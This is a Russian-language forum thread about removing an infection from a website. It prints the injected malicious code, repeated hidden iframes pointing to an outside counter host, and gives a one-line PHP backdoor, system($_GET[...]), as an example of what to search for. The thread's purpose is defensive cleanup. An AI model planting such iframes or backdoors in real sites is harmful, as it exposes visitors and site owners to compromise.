Разное

Касперский поругался на сайт моего друга, точнее на то что на сайте есть троян...
Вчера заходил к нему по ФТП обратил внимание на файл расположенный на уровень выше всего сайта
вот его содержание:

<iframe src='http://cooler.h18.ru/counter/index.php' width='1' height='1' style='visibility: hidden;'></iframe> <iframe src='http://cooler.h18.ru/counter/index.php' width='1' height='1' style='visibility: hidden;'></iframe> <iframe src='http://cooler.h18.ru/counter/index.php' width='1' height='1' style='visibility: hidden;'></iframe> <iframe src='http://cooler.h18.ru/counter/index.php' width='1' height='1' style='visibility: hidden;'></iframe> <iframe src='http://cooler.h18.ru/counter/index.php' width='1' height='1' style='visibility: hidden;'></iframe> <iframe src='http://cooler.h18.ru/counter/index.php' width='1' height='1' style='visibility: hidden;'></iframe> <iframe src='http://cooler.h18.ru/counter/index.php' width='1' height='1' style='visibility: hidden;'></iframe> <iframe src='http://cooler.h18.ru/counter/index.php' width='1' height='1' style='visibility: hidden;'></iframe> <iframe src='http://cooler.h18.ru/counter/index.php' width='1' height='1' style='visibility: hidden;'></iframe> <iframe src='http://cooler.h18.ru/counter/index.php' width='1' height='1' style='visibility: hidden;'></iframe> <iframe src='http://cooler.h18.ru/counter/index.php' width='1' height='1' style='visibility: hidden;'></iframe> <iframe src='http://cooler.h18.ru/counter/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

Касперский вопит, что троян...
кто-нить об этом знает чё-нить?

и что мешает удалить этот файл?

его-то удалили, но всё равно, на каждую страницу дописывается скрытый фрейм... где-то он внутре сайта сидит, я посмотреть не могу, а мой друг слабо в этом шарит
Еслиб ему сказать где искать...

Это скрытый ифрейм, тоесть он будет так же загружать дуланнную страницу, но пользователь этого не увидит. Обычно через скрытые ифреймы гонят траф, ну и накручивают сщетчики как в этом случаи.

Спасибо, это я знаю, просто я думал может кто точно знает, что делает именно эта ссылка.
А так же спасибо за участие, заразу нашли и удалили, пока вроде бы... посмотрим что будет дальше, а пароли на ФТП я его заставлю поменять, хотя не исключено что в коде сайта есть дыры... слишком там всё нахреначено, да и регистр глобалс = он.

Утянули FTP-пароли с хоста - теперь добавляют скрытые рекламные ссылки - нужно менять FTP-пароли и чистить хост.

>и чистить хост.

Хм, интересно, но не понял этого! Это как?

в теле сайта (или и того хуже за его пределами), может находиться скрипт, который при определённых условиях добавляет эту ссылку автоматически...
Теоритически:
Сегоджня удалили ссылку из файла, а через три дня она снова появилась, например потому, что кто-то в гостевой книге написал словосочетание "админ лох".

В первую очередь почистите свою машиннку, посмотрите чтоб всяких там троянов не было, далее, меняйте все пароли, на ака абракадабра вуаля, далее вам надо проверить все ваши скрипты, например вполне хватает добавить в любой скрипт system($_GET[vhsdf]); которого хватит для много, ну и конечно шелл, проверте все файлы по дате создания модификации, т.е. последние модифицированные или созданные проверте, вдруг один из них шелл.
Так же посмотрите access.log нет ли там ссылок с SQL-Inj или чего подобного.

>>и чистить хост.
>Хм, интересно, но не понял этого! Это как?
Ну, всё что робот поместил в файлы - удалить, не оставлять же рекламные ссылки.

PS Вообще говоря трояна следует искать на клиентских машиназ, с которых осуществляется доступ к FTP-серверу.